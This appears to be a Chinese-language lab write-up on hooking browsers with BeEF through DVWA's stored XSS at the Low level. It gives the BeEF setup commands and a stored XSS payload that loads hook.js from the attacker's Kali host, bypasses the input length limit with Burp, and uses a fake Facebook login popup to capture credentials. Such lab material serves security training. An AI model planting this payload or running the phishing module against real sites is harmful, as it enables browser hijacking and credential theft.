DVWA-XSS(Stored)-beef

用Low Level来测试beef的使用

beef配置

如果kali没有beef的,进行下载

bash 复制代码
apt install beef-xss

使用

bash 复制代码
beef-xss         # 命令方式启动
beef-xss-stop    # 命令方式关闭 
systemctl start beef-xss.service   #开启beefsystemctl 
stop beef-xss.service     #关闭beefsystemctl 
restart beef-xss.service  #重启beef

打开beef web界面

beef连接

拿Low Level 的xss漏洞测试

beef hook.js的链接为:http://192.168.20.145:3000/hook.js 145为kali IP。

输入666<script src="http://192.168.20.145:3000/hook.js"></script>

前端message处,前端做了输入长度限制,用burp抓包或者直接在前端界面修改长度限制都可以。

当客户端打开界面时192.168.20.1主机上线。(打开浏览器界面的主机会上线)

beef功能

Details:受害者浏览器信息

Logs:记录浏览器操作记录

Commands:向受害者发送指令的模块

下面记录几个功能

  1. 页面重定向

    选中Redirect Browser模块,右侧输入想要跳转到的网址

  2. 弹窗

    Pretty Theft模块,Dislog Type可以选择不同弹窗,这里用facebook做演示,Custom Log处选kali的IP。

    弹窗,输入账号密码。

    在beef的history处可以查看账号密码。

相关推荐
黑客Jack5 小时前
防御 XSS 的七条原则
安全·web安全·xss
hackeroink1 天前
【2024版】最新推荐好用的XSS漏洞扫描利用工具_xss扫描工具
前端·xss
网络安全Jack3 天前
[网络安全]XSS之Cookie外带攻击姿势详析
安全·web安全·xss
儒道易行3 天前
【bWAPP】XSS跨站脚本攻击实战
前端·web安全·网络安全·xss
Ares-Wang6 天前
Web 安全 跨站 跨域 XSS CSRF
前端·安全·xss
网络安全成叔11 天前
XSS(跨站攻击)
网络·安全·网络安全·漏洞·xss
儒道易行11 天前
【DVWA】XSS(Stored)
前端·网络安全·xss
网络安全King11 天前
XSS Challenges
网络·安全·web安全·xss
AirDroid_qs11 天前
Pikachu-XSS靶场(通关攻略)
网络·xss